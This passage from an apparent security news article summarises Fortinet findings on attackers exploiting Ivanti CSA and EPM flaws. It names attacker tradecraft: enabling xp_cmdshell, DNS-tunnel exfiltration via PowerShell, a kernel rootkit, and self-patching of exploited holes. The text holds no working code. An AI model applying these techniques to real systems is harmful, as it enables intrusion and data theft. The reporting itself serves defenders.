"On September 10, 2024, when the advisory for CVE-2024-8190 was published by Ivanti, the threat actor, still active in the customer's network, 'patched' the command injection vulnerabilities in the resources /gsb/DateTimeTab.php, and /gsb/reports.php, making them unexploitable."

"In the past, threat actors have been observed to patch vulnerabilities after having exploited them, and gained foothold into the victim's network, to stop any other intruder from gaining access to the vulnerable asset(s), and potentially interfering with their attack operations."

SQLi vulnerability exploitation

The unknown attackers have also been identified abusing CVE-2024-29824, a critical flaw impacting Ivanti Endpoint Manager (EPM), after compromising the internet-facing CSA appliance. Specifically, this involved enabling the xp\_cmdshell stored procedure to achieve remote code execution.

It's worth noting that the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog in the first week of October 2024.

Some of the other activities included creating a new user called mssqlsvc, running reconnaissance commands, and exfiltrating the results of those commands via a technique known as DNS tunneling using PowerShell code. Also of note is the deployment of a rootkit in the form of a Linux kernel object (sysinitd.ko) on the compromised CSA device.

"The likely motive behind this was for the threat actor to maintain kernel-level persistence on the CSA device, which may survive even a factory reset," Fortinet researchers said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#auth